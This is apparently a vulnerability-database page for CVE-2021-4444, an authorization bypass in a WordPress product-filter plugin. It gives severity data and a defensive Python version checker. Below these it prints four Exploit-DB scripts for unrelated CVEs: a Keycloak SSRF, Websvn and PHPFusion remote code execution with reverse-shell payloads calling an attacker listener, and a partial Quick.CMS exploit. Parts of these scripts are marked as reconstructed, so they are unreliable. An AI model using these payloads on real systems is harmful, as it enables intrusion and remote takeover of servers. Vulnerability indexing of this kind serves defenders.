CVE-2021-4444
Published 2024-10-16
Priority: P2 (76) · High · 7.3 CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
ITW: VulnCheck KEV
Exploited in the wild
EPSS: 0.32% (23.8th percentile)
The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.4.9 due to missing authorization checks on various functions. This makes it possible for unauthenticated attackers to perform unauthorized actions such as creating new filters and injecting malicious JavaScript into a vulnerable site. This was actively exploited at the time of discovery.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| woobewoo | product_filter_for_woocommerce_by_wbw | <= 1.4.9 | — |
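The table gives only an upper bound (no fixed version is listed), so the practical question is "is this install inside the stated range". The script below is an added example, not code from the advisory, GHSA, VulnCheck or the plugin itself: it pulls the version out of a WordPress readme.txt (`Stable tag:`) or plugin header (`Version:`) and compares it numerically against 1.4.9. The plugin directory name `woo-product-filter` and the assumption that readme.txt is world-readable are mine; confirm both against your install.

```python
import re
import urllib.request
from typing import Optional, Tuple

# Assumptions, not taken from the advisory: the plugin's directory name and a
# world-readable readme.txt. Confirm both against your own WordPress install.
PLUGIN_SLUG = "woo-product-filter"
README_PATH = f"/wp-content/plugins/{PLUGIN_SLUG}/readme.txt"
LAST_VULNERABLE = "1.4.9"   # advisory: affected "up to, and including 1.4.9"


def parse_version(v: str) -> Tuple[int, ...]:
    """'1.4.10' -> (1, 4, 10). Numeric tuples compare correctly; comparing the
    raw strings would rank '1.4.10' below '1.4.9' and flag a patched site."""
    parts = re.findall(r"\d+", v)
    if not parts:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str, last_vulnerable: str = LAST_VULNERABLE) -> bool:
    """True when version <= last_vulnerable. The advisory names no fixed release,
    so anything newer than 1.4.9 is only 'outside the stated range', not 'patched'."""
    return parse_version(version) <= parse_version(last_vulnerable)


def extract_version(text: str) -> Optional[str]:
    """Read 'Stable tag: x.y.z' (readme.txt) or 'Version: x.y.z' (plugin header).
    Returns None when neither is present or the tag is non-numeric (e.g. 'trunk')."""
    m = re.search(r"^\s*(?:Stable tag|Version):\s*([0-9][0-9.]*)", text, re.M | re.I)
    return m.group(1) if m else None


def assess(text: str) -> dict:
    """Classify a readme/header body: affected True/False, or None when undecidable."""
    version = extract_version(text)
    if version is None:
        return {"version": None, "affected": None,
                "reason": "no numeric Stable tag / Version header found"}
    return {"version": version, "affected": is_affected(version),
            "reason": f"compared against {LAST_VULNERABLE}"}


def fetch_readme(base_url: str, timeout: float = 10.0) -> Optional[str]:
    """Remote check: GET the plugin readme. Returns None on any HTTP/network error."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + README_PATH, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except Exception:
        return None


# Constructed sample readme bodies (not real plugin files) so the check runs offline.
SAMPLE_VULNERABLE = "=== Product Filter by WooBeWoo ===\nContributors: woobewoo\nStable tag: 1.4.9\n"
SAMPLE_PATCHED = "=== Product Filter by WooBeWoo ===\nStable tag: 1.4.10\n"
SAMPLE_UNKNOWN = "=== Product Filter by WooBeWoo ===\nTags: woocommerce, filter\n"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # python3 check.py https://shop.example
        body = fetch_readme(sys.argv[1])
        print(assess(body) if body else "readme not reachable; read the plugin header on disk instead")
    else:
        for body in (SAMPLE_VULNERABLE, SAMPLE_PATCHED, SAMPLE_UNKNOWN):
            print(assess(body))
```

Two caveats: a readme's `Stable tag` can lag the code actually deployed (or read `trunk`), so a `None` result means "check the plugin's main PHP file on disk", not "not affected"; and because the advisory lists no fixed version, a site above 1.4.9 should still be taken to the current release rather than treated as closed.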
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.3 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
| vulncheck | — | 7.3 | HIGH | — |
GHSA
GHSA-2484-xfxv-q77x · ghsa_unreviewed · 2024-10-16 · CVE-2021-4444 [HIGH] · CWE-862 (Missing Authorization)
GHSA-2484-xfxv-q77x: The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 (same description as above).
VulnCheck
Product Filter by WooBeWoo plugin for WordPress Javascript Injection Vulnerability
vulncheck · 2021 · CVSS 7.3 · CVE-2021-4444 [HIGH]
Affected: WBW Product Filter by WooBeWoo plugin for WordPress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/w
No detection rules found.
Exploit-DB
(The entries below are indexed for other CVEs; none of them is a PoC for CVE-2021-4444.)
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
exploitdb · 2021-10-13 · CVSS 5.3 · CVE-2020-10770 [MEDIUM]
---
```python
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Date: 2021-10-09
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: 12.0.1
import argparse
import sys
import requests as r

# The OIDC authorization endpoint fetches whatever URL is supplied in request_uri, so pointing it at a
# listener you control produces an out-of-band hit (blind SSRF). The listener flag is an assumption:
# the original's argument list is cut off on this page.
parser = argparse.ArgumentParser(description="Keycloak 12.0.1 blind SSRF via OIDC request_uri")
parser.add_argument("-u", "--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
parser.add_argument("-l", "--listener", help="host:port you control, e.g. 192.168.0.1:4444")
args = parser.parse_args()
if len(sys.argv) < 5 or not args.url or not args.listener:
    parser.print_help()
    sys.exit(1)
Host, hook = args.url.rstrip("/"), args.listener
headerscontent = {"User-Agent": "Mozilla/5.0"}   # assumed; the original's header dict is not on this page
_req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers=headerscontent)
print(f"[*] request sent (HTTP {_req.status_code}); watch the listener at {hook} for an inbound connection")
```
Exploit-DB
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
exploitdb · 2021-06-21 · CVSS 9.8 · CVE-2021-32305 [CRITICAL]
---
```python
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target.rstrip('/')
else:
    target = "http://" + args.target.rstrip('/')
# The search term is interpolated into a shell command, so ";<cmd>;" closes the quoted argument and
# runs PAYLOAD. Everything from here on is reconstructed; the page's copy of the exploit is cut off.
url = target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))
print(f"[*] Sending payload to {url}")
try:
    requests.get(url, timeout=10)
except requests.exceptions.RequestException as e:
    print(f"[!] request failed: {e}")
```
Exploit-DB
PHPFusion 9.03.50 - Remote Code Execution
exploitdb · 2021-05-28 · CVSS 8.8 · CVE-2020-24949 [HIGH]
---
```python
# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
# Date: 20/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
# Version: 9.03.50
# Tested on: Docker + Debian GNU/Linux 8 (jessie)
# CVE : CVE-2020-24949
# Found by: ThienNV
import requests
import base64
import argparse
# Redirections "<&4 >&4" restored; the angle brackets were lost in extraction on this page.
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");' " # !!spaces are important in order to avoid ==!!
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
target = args.target.rstrip('/')
# Trailing spaces pad PAYLOAD to a multiple of 3 bytes so base64 emits no '=' (reconstructed from here on;
# the page's copy of the exploit is cut off).
encoded = base64.b64encode(PAYLOAD.encode()).decode()
url = target + REQUEST_PAYLOAD.format(encoded)
print(f"[*] Sending payload to {url}")
requests.get(url, timeout=10)
```
Exploit-DB
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
exploitdb · 2021-01-29 · CVSS 7.2 · CVE-2020-35754 [HIGH]
---
```python
# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: 6.7
import sys
import requests
from termcolor import colored   # third-party: pip install termcolor

if len(sys.argv) != 6:   # usage check reconstructed; the page's copy of the original is garbled here
    print((colored("[~] Usage: python3 quickpwn.py <url> <username> <password> <lhost> <lport>","red")))
    print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ [email protected] pass123 192.168.101.101 4444","red")))
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]
#Start session
s = requests.Session()
# User-Agent completed with the standard Firefox 78 string (assumed; the original is cut off on this page)
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
# The login and upload steps of the original exploit are not reproduced on this page.
```
No writeups or analysis indexed.